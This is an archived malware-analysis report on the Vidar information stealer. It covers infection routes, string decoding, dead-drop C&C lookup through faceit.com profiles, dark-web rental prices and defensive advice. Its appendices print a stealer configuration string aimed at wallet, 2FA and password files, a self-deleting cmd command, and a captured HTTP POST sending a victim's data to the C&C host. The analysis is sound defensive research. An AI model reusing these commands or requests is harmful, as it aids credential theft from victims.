{
	"id": "72a2285e-8bcc-4ea5-99a8-763fa8ee094a",
	"created_at": "2026-04-06T00:19:22.545472Z",
	"updated_at": "2026-04-10T03:20:23.1523Z",
	"deleted_at": null,
	"sha1_hash": "6bcc78341d22a61bcd70d585127fd7e32cc4ebaf",
	"title": "Deep Analysis of Vidar Stealer",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4348699,
	"plain_text": "Deep Analysis of Vidar Stealer\r\nBy S2W\r\nPublished: 2022-05-23 · Archived: 2026-04-05 16:23:55 UTC\r\nAuthor:\r\n(Sojun Ryu) @ Talon\r\nPress enter or click to view image in full size\r\nMonkey Thief\r\nExecutive Summary\r\nVidar Stealer is a malware specialized in stealing information mainly distributed as spam mail or crack\r\nversion commercial software and keygen program. When installed, data such as infected device\r\ninformation, account, and history recorded in the browser is collected and leaked to the C\u0026C server.\r\nIn particular, it is one of the Stealer logs widely traded in DDW, and logs of infected PCs worldwide are\r\nbeing sold.\r\nPreviously, Vidar Stealer communicated with the C\u0026C server hard-coded inside the malware, but from\r\nFebruary 3, 2021, the method was changed to dynamically read the C\u0026C server from the regular site.\r\nVidar stealer switches its target software frequently in order to steal credential information stored in\r\nvarious browsers and programs. Therefore, the C\u0026C server is continuously changing, so an automated\r\nresponse is necessary.\r\nS2W LAB has been analyzing Vidar Stealer malware behaviors and tracking changes and preventing\r\nrelated damage by collecting logs that are traded through DDW.\r\nhttps://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed\r\nPage 1 of 23\n\nPress enter or click to view image in full size\r\nThe flow of Vidar Stealer behavior\r\nRelated Articles\r\n1. Deep Analysis of Raccoon Stealer, Seonghoe Kim\r\n2. Story of the week: Stealers on the Darkweb, Hyunmin Suh \u0026 Minjei Cho\r\nThe Routes of Infection\r\nRecently, Vidar Stealer is mainly disguised as a Windows activation software. Because the Windows product is\r\nexpensive, many people download illegal activation software to use it for free. In addition to Windows, many\r\ncases are disguised as a cracked commercial software, keygen software, etc. Users may recognize the risk of the\r\nsoftware as most vaccines be able to detect and alert users, but they tend to ignore and execute them by taking\r\ntheir own risk.\r\nPress enter or click to view image in full size\r\nWindows 10 Pro x64 keygen, Ardamax Keylogger 5.2 Crack, SmartMovie v3.25 Keygen\r\nLast year, Vidar Stealer was distributed in South Korea through spam emails impersonated by the Fair Trade\r\nCommission. The contents in the email lure victims to open the attached file disguised as an official request letter.\r\nIf the victim executes the attached file disguised as a document file icon, the user will be infected by Vidar stealer.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed\r\nPage 2 of 23\n\nEmail disguised as the Fair Trade Commission\r\nAs Vidar Stealer has not been distributed with high-level technologies or serious vulnerabilities so far, so if users\r\ndo not use illegal programs or access suspicious sites with caution, they can sufficiently prevent infection.\r\nhttps://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed\r\nPage 3 of 23\n\nVidar Stealer Behavior Analysis\r\n1. Loader\r\nVidar Stealer is packed with an unknown loader to prevent analysis. This loader’s characteristic is that data,\r\nstrings, binaries, and other data necessary for malicious behavior do not have regularity. Because of this feature, it\r\nis challenging to detect this loader completely with a static method using detection signatures and Yara rules. In\r\naddition, even if the loader is detected, there is a limit to accurately distinguishing what the actual internal\r\nmalicious code is.\r\nCode that assigns execute permission (VirtualProtect)\r\nPress enter or click to view image in full size\r\nAdditional binary decoding routine\r\nPress enter or click to view image in full size\r\nOn March 31, 2021, a malware analyst on Twitter (@c3rb3ru5d3d53c) named this Loader “DerpLoader” and\r\nnoted that Vidar Stealer, as well as other Stealer malware such as KPot Stealer and Racoon Stealer, use it. As a\r\nresult of the analysis, it was confirmed that all three stealers’ loaders are the same loader. Stealers mainly use EXE\r\ndistribution methods disguised as specific programs, so they are easily exposed to AV. It is assumed that various\r\nStealers use this loader to maximize detection avoidance.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed\r\nPage 4 of 23\n\nVidar Stealer and DerpLoader mentioned on Twitter\r\n2. Vidar Stealer\r\nDecode strings\r\nWhen Vidar Stealer is executed by the loader, the encoded string is firstly decoded and the string required for\r\nmalicious behavior is extracted. As a decoding method, RC4 and Base64 are used in combination. For the RC4\r\nKey, a string composed of 18 numbers is used, and each sample uses a different key.\r\nPress enter or click to view image in full size\r\nEncoded strings in Vidar Stealer\r\nPress enter or click to view image in full size\r\nDecoding strings using CyberChef\r\nDynamic collection of C\u0026C servers\r\nIn the former Vidar Stealer malware, the C\u0026C server address was hard-coded. However, starting on February 3\r\nthis year, a method of dynamically collecting C\u0026C servers has started using API functions provided by\r\nhttps://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed\r\nPage 5 of 23\n\n“faceit.com”, a Russian game-related community. The advantage of this method is that the faceit.com site cannot\r\nbe blocked because it is a normal site.\r\nAccording to the former method, if the C\u0026C server used by the malware is taken down, the malware becomes\r\nuseless. However, in the case of dynamic collection, the C\u0026C of the malware can be automatically updated by\r\nchanging the content of “faceit.com” without modifying the malware every time.\r\nURL to get C\u0026C\r\nhttps://api.faceit[.]com/core/v1/nicknames/[Attacker's nickname]\r\nPress enter or click to view image in full size\r\nC\u0026C server is included in the ‘about’ field of JSON format data\r\nNormal DLL file download\r\nAfter that, Vidar Stealer downloads the normal DLL file required for malicious activity.\r\nNormal DLL File Path\r\nC:\\ProgramData\\\r\nNormal DLL files related to Firefox\r\n1. freebl3.dll\r\n2. mozglue.dll\r\n3. msvcp140.dll\r\n4. nss3.dll\r\n5. softokn3.dll\r\nNormal DLL files related to C/C++\r\n1. vcruntime140.dll\r\n2. msvcp140.dll\r\nRequest configuration data\r\nAfter downloading the DLL file, the malware requests a specific page containing the configuration values. On this\r\npage, option values for which data to collect from the infected device are specified. Each option value is divided\r\nhttps://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed\r\nPage 6 of 23\n\nby ‘,’ and consists of a total of 12 values. Among these, some option values are not actually used. In addition,\r\npasswords.txt, information.txt, outlook.txt, files\\Soft are unconditionally collected regardless of the options.\r\nExample of configuration data page1,1,1,1,1,1,1,1,1,1,250,Default;%DESKTOP%\\;*.txt:*.dat:*wallet*.*:*\r\nOption 1, 5, 6, 10, 11 : Not used\r\nOption 2: Option to steal Browser’s Autofill, Cookies, Credit Cards data\r\nOption 3: Option to steal Browser’s History, Downloads\r\nOption 4: Option to steal Wallet data\r\nOption 7: Option to steal Telegram data\r\nOption 8: Option to get the Screen capture\r\nOption 9: Option to steal Certain files\r\nGet S2W’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nWhen the 9th option is activated, all files with a specific file name are collected using the last string separated by\r\n‘;’. The format is as follows, and the collected files are saved in files\\Files\\[Work Folder].\r\nString format for collecting files\r\n[Save Folder];[Target Path];[Target file name list];[Maximum file size];[Seperator]\r\nData Theft\r\nThe target software list is as follows. The target browser may be different for each malware because the attacker\r\ncan customize the target browser list. As the version of Vidar Stealer goes up, the collection range is getting wider,\r\nand as of March 21, the highest version identified is 38. All stolen information is collected in the path below.\r\nPath for collecting data\r\nC:\\ProgramData\\[A-Z0–9]{25}\\files\\\r\nhttps://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed\r\nPage 7 of 23\n\nCompress the collected folder\r\nAfter collecting all the data, compress the “\\files” folder into a ZIP file. The path of the created ZIP file is as\r\nfollows, and different file names are used for each version.\r\nC:\\ProgramData\\[A-Z0–9]{25}\\[MachineGUID][0–9]{10}.zip\r\nSend data\r\nAfterward, it transmits a ZIP file containing the stolen data along with the infected device ID, information, and the\r\nversion of Vidar to the C\u0026C server.\r\nDownload additional payload\r\nIf the attacker sets additional functions, there is the function to download and execute additional malware after\r\nleaking information to the C\u0026C server. After requesting HTTP_QUERY_REFRESH, if the result contains the\r\nstring “http”, it accesses the given URL to read additional configuration data. After this process, finally, it extracts\r\nthe URL and downloads the malicious payload.\r\nFlow of downloading additional payload\r\nC\u0026C Server → Download configuration data → Get download URL → Download another malwarePath and pa\r\nC:\\ProgramData\\[A-Z0–9]{16}.exe “:Zone.Identifier”\r\nhttps://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed\r\nPage 8 of 23\n\nSelf-deleting\r\nAfter performing all malicious actions, Vidar Stealer deletes its own traces with the command below.\r\n“C:\\Windows\\System32\\cmd.exe” /c taskkill /im [Filename] /f \u0026 erase [File path] \u0026 exit\r\nAnalysis of the domain used in the attack\r\nS2W LAB has been continuously monitoring and tracking Vidar Stealer’s C\u0026C server construction method for\r\nthree months since February 2021.\r\n1. api.faceit.com\r\nThe attacker first joined a game-related community in Russia called “faceit.com”. After that, the attacker has been\r\nupdating the C\u0026C server by using the Profile section of the user information page, and the malware requests this\r\ninformation through the API.\r\nPress enter or click to view image in full size\r\nC\u0026C server stored in the user information page\r\nThe attacker has changed the community nickname for about three months and the C\u0026C server collection URL.\r\nThere are a total of 6 nicknames identified so far, and the created time and collected C\u0026C servers are summarized\r\nbelow. When the nickname is replaced, the C\u0026C server is not updated from the existing nickname, and the\r\nexisting C\u0026C servers are no longer used.\r\nList of “faceit.com” addresses used to collect C\u0026C servers\r\nhttps://api.faceit.com/core/v1/nicknames/yetveirrifcu, Created time: 2021–02–03 15:39:24 (UTC)\r\nhttps://api.faceit.com/core/v1/nicknames/tronhack, Created time: 2021–02–19 13:13:17 (UTC)\r\nhttps://api.faceit.com/core/v1/nicknames/slowyen, Created time: 2021–03–01 19:34:49 (UTC)\r\nhttps://api.faceit.com/core/v1/nicknames/sergeevih, Created time: 2021–03–11 20:36:28 (UTC)\r\nhttps://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed\r\nPage 9 of 23\n\nhttps://api.faceit.com/core/v1/nicknames/dendytest, Created time: 2021–03–15 17:23:12 (UTC)\r\nhttps://api.faceit.com/core/v1/nicknames/xeronxik123, Created time: 2021–03–18 11:07:19 (UTC)\r\nhttps://api.faceit.com/core/v1/nicknames/vyh62lapin, Created time: 2021–03–30 20:46:17 (UTC)\r\nhttps://api.faceit.com/core/v1/nicknames/sslamlssa, Created time: 2021–04–26 15:50:43 (UTC)\r\nhttps://api.faceit.com/core/v1/nicknames/ramilgame, Created time: 2021–05–04 08:40:44 (UTC)\r\nhttps://api.faceit.com/core/v1/nicknames/legomind, Created time: 2021–05–17 23:39:57 (UTC)\r\nhttps://api.faceit.com/core/v1/nicknames/pavel23puef, Created time: 2021–05–24 17:09:30 (UTC)\r\n2. C\u0026C server\r\nThe attacker used many domains and IPs because the C\u0026C server was changed in one day or every 3 to 4 days.\r\nWe arranged the C\u0026C server domains that we collected over three months, and we were able to confirm some\r\ncharacteristics.\r\nMost domains registered through NameSilo\r\nPress enter or click to view image in full size\r\nNumerous C\u0026C servers registered through NameSilo\r\nE-mail that the attacker used to register the domain. In particular, “xeronxik123” is strongly suspected as\r\nthe ID was also used as the faceit.com nickname.\r\n1) kiseleva.veronika.73@gmail.com\r\n2) xeronxik123@gmail.com\r\nPress enter or click to view image in full size\r\nInitially, the attacker registered and used the domain, but after that, it seems that the normal domain was\r\ncompromised and used as a C\u0026C server. Recently, Vidar communicates with IP type C\u0026C server, and sometimes\r\nit is reused when the nickname is changed.\r\nhttps://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed\r\nPage 10 of 23\n\nVidar Stealer C\u0026C Server List\r\nThe latest version of C\u0026C Server list is continuously updated on the Google Sheet\r\nhttps://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed\r\nPage 11 of 23\n\nhttps://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed\r\nPage 12 of 23\n\nVidar Stealer C\u0026C Server List\r\n3. Admin site\r\nVidar Stealer can manage infected devices and control overall statistics through the admin site “my-vidar.com”.\r\nPress enter or click to view image in full size\r\nmy-vidar.com/auth/login\r\nVidar Stealer in DDW\r\n1. Vidar Stealer rental post\r\nhttps://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed\r\nPage 13 of 23\n\nVidar Stealer is a MaaS-type malware sold on dark web forums. As shown in the post below, sales are being made,\r\nand they are actively trading from at least November 2018 to the present. Attackers collect information by\r\ntargeting specific users with the rented malware or sell logs collected to an unspecified number of users again on\r\nDDW.\r\n• Prices\r\n7 days → $130\r\n14 days → $200\r\n30 days → $300\r\n60 days → $580\r\n90 days → $750\r\nPress enter or click to view image in full size\r\nVidar Stealer sales post on the dark web\r\nInside the Admin page\r\nPress enter or click to view image in full size\r\nhttps://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed\r\nPage 14 of 23\n\nPress enter or click to view image in full size\r\n2. Vidar Stealer Log Sales Post\r\nPosts that sell logs collected by Vidar Stealer to DDW are also being found steadily. Mostly, rather than logs for a\r\nsingle target, many logs containing various countries are sold. It is often found that such postings also include\r\nKorea.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed\r\nPage 15 of 23\n\nVidar Stealer Log Sales in Deep Web Forum\r\nSince the collected log files are divided into KR as below, it is easy to identify that they are Korean victims, and\r\npassword information and infected device information are stored inside the file.\r\nPress enter or click to view image in full size\r\nVidar Stealer log files\r\nhttps://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed\r\nPage 16 of 23\n\nPress enter or click to view image in full size\r\nKorean site cookie information in the log file\r\nConclusion\r\nThe latest version of all Vidar Stealer malicious code C\u0026C servers are constantly being changed through a\r\ndynamic acquisition method, but only one C\u0026C server is active at the time of execution. Therefore, if a new C\u0026C\r\nserver can be collected by monitoring the C\u0026C server collection URL, information leakage can be prevented even\r\nif it is infected with a malicious code, and measures can be taken by detecting infected devices attempting to\r\nconnect.\r\nS2W LAB is monitoring the continuously updated Vidar Stealer C\u0026C server collection URL, and through this, the\r\nC\u0026C server is also being collected. In addition, we continue to analyze and track changes in Vidar Stealer’s C\u0026C\r\nconnection method.\r\nIn the past, Stealer malware caused direct damage to individuals rather than companies, but with the recent\r\nincrease in telecommuting due to the coronavirus, Stealer malware likely to steal accounts that can access\r\ncorporate business networks. Since account stealing is attempted not only for web browsers but also for various\r\nsoftware, if important accounts are stolen, it is possible to infiltrate the corporate network. So, if these logs are\r\nsold to ransomware attack groups, the damage is out of control.\r\nIn order to prevent Vidar Stealer infection, users should be cautious of executing programs from unknown sources,\r\nexecuting cracked or illegal activation programs, and opening spam emails.\r\nWe also provide futher information regarding various Stealers via Xarvis Enterprise. Please refer to\r\nPress enter or click to view image in full size\r\nhttps://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed\r\nPage 17 of 23\n\nRelation Graph of Vidar Stealer on Xarvis Enterprise\r\nPress enter or click to view image in full size\r\nCredential Leak Monitoring Dashboard inside Xarvis Enterprise\r\nAppendix\r\nAppendix 1: Example of the leaked file\r\nFilename: information.txt\r\nhttps://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed\r\nPage 18 of 23\n\nVersion: 37.5\r\n Date: Fri Feb 12 08:24:56 2021\r\n MachineID: eeeb5d54-7880-42a7-b542-739bbc26cf4b\r\n GUID: {846ee340-7039-11de-9d20-806e6f6e6963}\r\n HWID: eeeb5d54-7880-42a7-b542-9d20-806e6f6e6963\r\n Path: C:\\Users\\admin\\AppData\\Roaming\\build.exe\r\n Work Dir: C:\\\\ProgramData\\\\A2KA889SJFAXH2KBIL2MLRZVK\r\n Windows: Windows 7 Professional [x64]\r\n Computer Name: USER-PC\r\n User Name: admin\r\n Display Resolution: 1280x720\r\n Display Language: en-US\r\n Keyboard Languages: English (United States)\r\n Local Time: 12/2/2021 8:24:56\r\n TimeZone: UTC-0\r\n [Hardware]\r\n Processor: Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz\r\n CPU Count: 4\r\n RAM: 4095 MB\r\n VideoCard: Standard VGA Graphics Adapter\r\n [Processes]\r\n ---------- System [4]\r\n ------------------------------ smss.exe [272]\r\n - csrss.exe [352]\r\n - wininit.exe [400]\r\n - csrss.exe [412]\r\n - winlogon.exe [456]\r\n - services.exe [496]\r\n - lsass.exe [504]\r\n - lsm.exe [512]\r\n - svchost.exe [616]\r\n - IMEDICTUPDATE.EXE [1224]\r\n - srvpost.exe [1356]\r\n - SearchIndexer.exe [1412]\r\n - taskhost.exe [1796]\r\n ….\r\n [Software]\r\n Adobe Flash Player 27 ActiveX [27.0.0.187]\r\n Adobe Flash Player 27 NPAPI [27.0.0.187]\r\n Adobe Flash Player 27 PPAPI [27.0.0.187]\r\n Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 [12.0.30501.0]\r\n Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 [14.21.27702]\r\n Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 [14.21.27702]\r\nhttps://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed\r\nPage 19 of 23\n\nSkype 7.39 [7.39.102]\r\n Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 [14.21.27702.2]\r\n -2019 Redistributable (x64) - 14.21.27702 [14.21.27702.2]\r\n Realtek AC'97 Audio\r\nAppendix 2: Communication\r\napi.faceit.com connection packet (HTTPS connection)\r\nPress enter or click to view image in full size\r\nJSON data received from C\u0026C\r\n{\r\n \"result\": \"ok\",\r\n \"payload\": {\r\n \"country\": \"ca\",\r\n \"registration_status\": \"active\",\r\n \"about\": \"duckclack.com|\",\r\n \"matches_left\": 0,\r\n \"private_tournaments_invitations\": {},\r\n \"user_type\": \"user\",\r\n \"games\": {},\r\nhttps://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed\r\nPage 20 of 23\n\n\"matches_not_played\": 0,\r\n \"settings\": {\r\n \"language\": \"en\"\r\n },\r\n \"active_team_id\": null,\r\n \"newsletter_promotions\": false,\r\n \"version\": 4,\r\n \"created_by\": \"anonymous\",\r\n \"favorite_tournaments\": [],\r\n \"activated_at\": \"Wed Feb 03 15:39:24 UTC 2021\",\r\n \"invitations_remaining\": 10,\r\n \"steam_id\": \"\",\r\n \"ongoing_rooms\": {},\r\n \"updated_by\": \"5ee7a37c-54b8-4dac-a211-0329602f9398\",\r\n \"guid\": \"5ee7a37c-54b8-4dac-a211-0329602f9398\",\r\n \"private_tournaments\": [],\r\n \"status\": \"AVAILABLE\",\r\n \"guest_info\": {},\r\n \"notification_tournament_joined_starts\": false,\r\n \"friends_ids\": [],\r\n \"flag\": \"\",\r\n \"created_at\": \"Wed Feb 03 15:39:24 UTC 2021\",\r\n \"membership\": {\r\n \"type\": \"free\"\r\n },\r\n \"memberships\": [\r\n \"free\"\r\n ],\r\n \"newsletter_general\": false,\r\n \"nickname\": \"yetveirrifcu\",\r\n \"ongoing_tournaments\": {},\r\n \"socials\": {},\r\n \"website\": \"\",\r\n \"verified\": false,\r\n \"entity_type\": \"user\"\r\n },\r\n \"server_epoch_time\": 1613118241,\r\n \"message\": \"Operation performed correctly.\",\r\n \"env\": \"prod\",\r\n \"you_are\": {\r\n \"roles\": [\r\n \"anonymous\"\r\n ],\r\n \"user\": \"anonymous\"\r\n },\r\nhttps://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed\r\nPage 21 of 23\n\n\"version\": \"2.174.3\"\r\n }\r\nConfiguration data for stealing information\r\n1,1,1,1,1,1,1,0,1,1,250,Desktop;%DESKTOP%\\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*passwo\r\nCaptured Packet to breach victim’s data\r\nPOST / HTTP/1.1\r\n Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, i\r\n Accept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\n Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\n Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\n Content-Length: 8698\r\n Host: duckclack.com\r\n Connection: Keep-Alive\r\n Cache-Control: no-cache\r\n --1BEF0A57BE110FD467A\r\n Content-Disposition: form-data; name=\"hwid\"\r\n eeeb5d54-7880-42a7-b542-9d20-806e6f6e6963\r\n --1BEF0A57BE110FD467A\r\n Content-Disposition: form-data; name=\"os\"\r\n Windows 7 Professional\r\n --1BEF0A57BE110FD467A\r\n Content-Disposition: form-data; name=\"platform\"\r\n x64\r\n --1BEF0A57BE110FD467A\r\n Content-Disposition: form-data; name=\"profile\"\r\n 399\r\n --1BEF0A57BE110FD467A\r\n Content-Disposition: form-data; name=\"user\"\r\n admin\r\n --1BEF0A57BE110FD467A\r\n Content-Disposition: form-data; name=\"cccount\"\r\n 0\r\n --1BEF0A57BE110FD467A\r\n Content-Disposition: form-data; name=\"fcount\"\r\n 2\r\n --1BEF0A57BE110FD467A\r\nhttps://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed\r\nPage 22 of 23\n\nContent-Disposition: form-data; name=\"telegram\"\r\n 0\r\n --1BEF0A57BE110FD467A\r\n Content-Disposition: form-data; name=\"ver\"\r\n 37.5\r\n --1BEF0A57BE110FD467A\r\n Content-Disposition: form-data; name=\"ccount\"\r\n 0\r\n --1BEF0A57BE110FD467A\r\n Content-Disposition: form-data; name=\"logs\"; filename=\"eeeb5d54-7880-42a7-b542-739bbc26cf4b856836309\r\n Content-Type: zip\r\n PK\r\n ...\r\n PK\r\n --1BEF0A57BE110FD467A--\r\nAppendix 3: MITRE ATT\u0026CK\r\nPress enter or click to view image in full size\r\nSource: https://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed\r\nhttps://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed\r\nPage 23 of 23\n\nAdobe Flash Adobe Flash Player 27 Player 27 NPAPI [27.0.0.187] PPAPI [27.0.0.187]  \nMicrosoft Visual C++ 2013 Redistributable (x64)-12.0.30501 [12.0.30501.0]\nMicrosoft Visual C++ 2019 X86 Minimum Runtime-14.21.27702 [14.21.27702]\nMicrosoft Visual C++ 2019 X86 Additional Runtime-14.21.27702 [14.21.27702]\n   Page 19 of 23",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed"
	],
	"report_names": [
		"deep-analysis-of-vidar-stealer-ebfc3b557aed"
	],
	"threat_actors": [],
	"ts_created_at": 1775434762,
	"ts_updated_at": 1775791223,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6bcc78341d22a61bcd70d585127fd7e32cc4ebaf.pdf",
		"text": "https://archive.orkl.eu/6bcc78341d22a61bcd70d585127fd7e32cc4ebaf.txt",
		"img": "https://archive.orkl.eu/6bcc78341d22a61bcd70d585127fd7e32cc4ebaf.jpg"
	}
}